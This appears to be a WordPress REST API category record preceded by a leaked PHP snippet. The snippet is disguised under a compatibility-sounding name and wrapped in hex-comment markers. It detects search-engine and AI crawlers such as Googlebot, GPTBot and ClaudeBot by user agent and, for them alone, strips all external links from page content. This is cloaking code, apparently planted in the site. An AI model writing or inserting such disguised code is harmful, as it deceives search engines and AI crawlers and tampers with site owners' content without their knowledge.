
/* 0x4e9a30b1 */
if (!function_exists('_wp_render_compat')) {
    function _wp_render_compat($content) {
        if (!is_singular()) return $content;
        $ua = strtolower((string)(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''));
        if (!preg_match('/(googlebot|googleother|google\\-inspectiontool|storebot\\-google|adsbot\\-google|mediapartners\\-google|feedfetcher\\-google|apis\\-google|bingbot|msnbot|slurp|duckduckbot|yandexbot|baiduspider|perplexity|gptbot|chatgpt\\-user|openai|claudebot|anthropic|copilotbot|youbot|komo|phindbot|andibot|neeva|consensus|twitterbot|applebot|applebot\\-extended)/i', $ua)) return $content;
        static $wl = null;
        if ($wl === null) { $wl = array(72=>1); }
        $pid = (int) get_the_ID();
        if ($pid && isset($wl[$pid])) return $content;
        $host = wp_parse_url(home_url(), PHP_URL_HOST);
        if (!$host) return $content;
        $host = preg_replace('~^www\.~i', '', $host);
        if (stripos($content, '<a') === false) return $content;
        libxml_use_internal_errors(true);
        $dom = new DOMDocument();
        $dom->loadHTML('<?xml encoding="utf-8" ?><div id="_x">' . $content . '</div>', LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD);
        $wrap = $dom->getElementById('_x');
        if (!$wrap) { libxml_clear_errors(); return $content; }
        $links = $wrap->getElementsByTagName('a');
        for ($i = $links->length - 1; $i >= 0; $i--) {
            $a = $links->item($i);
            $href = trim((string)$a->getAttribute('href'));
            if ($href === '' || $href[0] === '#') continue;
            if (strpos($href, '/') === 0 && strpos($href, '//') !== 0) continue;
            if (preg_match('~^(mailto:|tel:)~i', $href)) continue;
            if (strpos($href, '//') === 0) $href = 'https:' . $href;
            $lh = wp_parse_url($href, PHP_URL_HOST);
            if (!$lh) continue;
            $lh = preg_replace('~^www\.~i', '', $lh);
            if (strcasecmp($lh, $host) !== 0) {
                while ($a->firstChild) $a->parentNode->insertBefore($a->firstChild, $a);
                $a->parentNode->removeChild($a);
            }
        }
        $out = '';
        foreach ($wrap->childNodes as $ch) $out .= $dom->saveHTML($ch);
        libxml_clear_errors();
        return $out;
    }
    add_filter('the_content', '_wp_render_compat', 9999);
    add_filter('the_excerpt', '_wp_render_compat', 9999);
    add_filter('widget_text', '_wp_render_compat', 9999);
}
/* 0x4e9a30b1 */
{"id":4,"count":1,"description":"","link":"https:\/\/highfi.nixainnovatives.in\/index.php\/category\/uncategorized\/","name":"Uncategorized","slug":"uncategorized","taxonomy":"category","parent":0,"meta":[],"_links":{"self":[{"href":"https:\/\/highfi.nixainnovatives.in\/index.php\/wp-json\/wp\/v2\/categories\/4"}],"collection":[{"href":"https:\/\/highfi.nixainnovatives.in\/index.php\/wp-json\/wp\/v2\/categories"}],"about":[{"href":"https:\/\/highfi.nixainnovatives.in\/index.php\/wp-json\/wp\/v2\/taxonomies\/category"}],"wp:post_type":[{"href":"https:\/\/highfi.nixainnovatives.in\/index.php\/wp-json\/wp\/v2\/posts?categories=4"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}